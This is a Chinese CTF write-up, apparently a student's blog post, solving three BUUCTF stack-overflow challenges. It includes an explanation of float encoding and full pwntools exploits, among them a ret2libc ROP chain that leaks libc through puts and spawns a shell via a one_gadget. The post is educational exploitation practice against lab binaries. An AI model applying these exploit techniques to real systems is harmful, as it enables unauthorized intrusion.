&pwn1_sctf_2016 &ciscn_2019_n_1 &ciscn_2019_c_1 &ciscn_2019_en_2&
在做buu题目的时候,发现在最上面有几道被各位师傅打到1分的题,强迫症逼迫我去做那几道题。
这里来试着去解决这些题。。。讲真的,我感觉自己刷题真的少,即使是很简单的栈题目,我还是能学习到新的东西。这里就记录一下这几道题。
pwn1_sctf_2016
检查了一下保护,32位程序,只开启了堆栈不可执行。直接ida看一下伪代码吧。
看代码也就是一个简单的栈溢出。但是我并没有自己做出这道题,太菜了。。。大一下学期我们有开设C++这门课,但是我由于一些事情,在家休息了一个多月,结果课也落下了。。。太痛苦了,C++吃亏在这里了,总要补的。。。
其实这个CTF就应该半分做,半分蒙。可以看到fgets是对我们输入的内容进行了限制,所以我们不能溢出到返回地址,但是可以看到两个字符串“I”和“you”,其实应该输入这几个字符串进去看看是什么意思的。
这里其实是一个回显,但是你如果输入“I”的话,就会给你自动转换成you,所以就解决溢出不到返回地址的问题了。接下来就是计算了。题目本身有可以直接拿shell的函数,直接返回地址转到那个shell 的地址就行了。还是羞耻的贴一下exp:
1 from pwn import *
2
3 p = process('./1')
4 context.log_level = 'debug'
5
6 shell_addr = 0x08048F0D
7
8 payload = 'I'*21 + 'b' + p32(shell_addr)
9 p.sendline(payload)
10 p.recv()
11 p.recv()
ciscn_2019_n_1
64位程序,保护只开启了堆栈不可执行。
老套路,IDA看一下伪代码。
可以看到这里gets是可以进行溢出的,但是这道题我们没有必要进行溢出,只要覆盖到v2,让v2==11.28125就可以了。
接下来就是要明白浮点数如何在内存中表示了。
所以11.28125用二进制表示的话,就是1011.01001,但是计算机可不会知道哪里有小数点,计算机只会识别01,至于这些01表示什么,那是由人定义的。就像这里,人们把这个定义为浮点数,当呈现在我们面前的时候,就是按照浮点数给我解释的。
一个浮点数占有四个字节,一个字节由两个四位二进制数表示,那么大概就是这么个意思。
xxxxxxxx xxxxxxxxx xxxxxxxx xxxxxxxx
每个x都是占一个位,而对于浮点是计算机是怎么进行解释的呢?
如你所见,32位每一位都有意义。
符号位(Sign) : 0代表正,1代表为负
指数位(Exponent):用于存储科学计数法中的指数数据,并且采用移位存储。
尾数部分(Mantissa):尾数部分
还是拉回来,看1011.01001 = 1011.01001*2的0次方 == 1.01101001*2的3次方
因为是正数,所以符号位为0
指数为127+1==128,127是一个偏移,这个偏移是由于说这个指数可能是负数,用这个指数位的时候需要先减去127再用,所以这里是127。(你或许没有听懂...大概意思有个组织这么规定了指数的正负)3就就是上面2的次方。
再看尾数部分,尾数部分是01101001,接下来我们试着来写一下这个二进制数
0 1000 0010 0110 1001 0000 0000 0000 000
所以连起来就是01000001001101001000000000000000
转换成16进制就是0x4134800,所以我们把V2的位置覆盖成这个数字就行了。
贴一下exp:
1 from pwn import *
2
3 p = process('./ciscn_2019_n_1')
4 elf = ELF('./ciscn_2019_n_1')
5 context.log_level = 'debug'
6
7 payload = 'a'*(0x30-4) + p64(0x41348000)
8 p.sendlineafter('number.\n',payload)
9 p.recv()
ciscn_2019_c_1 / ciscn_2019_en_1
感觉两道题长得一模一样。。。用一个exp都打通了。
检查保护,64位程序,只开启了堆栈不可执行。
emmmmmmm,简单的rop,溢出leaklibc然后拿到shell。
用system拿不到shell,用one_getgad可以。
直接贴exp了:
1 from pwn import *
2
3 #p = process('./ciscn_2019_c_1')
4 p = remote('node3.buuoj.cn',27137)
5 elf = ELF('./ciscn_2019_c_1')
6 context.log_level = 'debug'
7
8 pop_rdi = 0x00400c83
9 sh = 0x0040045c
10 puts_plt = 0x004006E0
11 puts_got = elf.got['puts']
12 start = elf.symbols['_start']
13 #start = 0x0004009A0 //encry fun
14
15 p.sendlineafter('choice!\n','1')
16 payload = 'a'*0x50 + 'bbbbbbbb'
17 payload += p64(pop_rdi) + p64(puts_got)
18 payload += p64(puts_plt) + p64(start)
19 p.sendlineafter('encrypted\n',payload)
20 sleep(0.1)
21 p.recv(0x67)
22 puts_addr = u64(p.recv(6).ljust(8,'\x00'))
23 print hex(puts_addr)
24 base_addr = puts_addr - 0x0809c0
25 system_addr = base_addr + 0x04f440
26 binsh_addr = base_addr + 0x1b3e9a
27 shell_addr = base_addr + 0x4f322
28
29 sleep(0.1)
30 p.sendlineafter('choice!\n','1')
31 payload = 'a'*0x50 + 'bbbbbbbb'
32 payload += p64(shell_addr)
33 p.sendlineafter('encrypted\n',payload)
34 sleep(0.1)
35 p.recv()
36 p.interactive()
37
38 '''
39 0x4f2c5 execve("/bin/sh", rsp+0x40, environ)
40 constraints:
41 rsp & 0xf == 0
42 rcx == NULL
43
44 0x4f322 execve("/bin/sh", rsp+0x40, environ)
45 constraints:
46 [rsp+0x40] == NULL
47
48 0x10a38c execve("/bin/sh", rsp+0x70, environ)
49 constraints:
50 [rsp+0x70] == NULL
51 '''
最新文章
- Solr Facet 默认值
- JavaScript学习笔记1之基础知识点
- Memcached初探
- eclipse加载maven工程提示pom.xml无法解析org.apache.maven.plugins:maven-resources-plugin:2.4.3解决方案
- Scalaz(33)- Free :算式-Monadic Programming
- 怎么配置Java环境变量?
- 转:python webdriver API 之 获取对象的属性
- Response.Cookies 和 Request.Cookies
- 【英语】Bingo口语笔记(33) - 面部器官系列
- linux 文件比对总结
- Flash Media Server 5.0 (FMS)注册码
- C# 发送邮件整理,包括控制台程序、WPF、WebForm 及 ASP.NET MVC
- 集成电路中的assert和deassert应该如何翻译?
- mysql时间int日期转换
- mongodb batchInsert
- Unix/Linux环境C编程入门教程(11) 开发环境搭建VMWare虚拟安装之虚拟化检测
- 真实故事:网站遭遇DOS攻击
- Http Post与Get等
- (NO.00003)iOS游戏简单的机器人投射游戏成形记(二)
- Net包管理NuGet(1)nuget的使用方法